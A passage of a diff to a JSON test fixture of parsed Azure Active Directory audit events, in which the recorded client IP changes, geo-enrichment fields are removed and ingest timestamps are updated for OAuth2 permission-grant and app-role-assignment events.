19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -11561,25 +10571,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -11593,7 +10585,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -11729,7 +10721,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -11741,12 +10733,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036412200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125163800Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -11772,25 +10764,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -11804,7 +10778,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -11940,7 +10914,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -11952,12 +10926,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036416500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125169100Z", + "original": 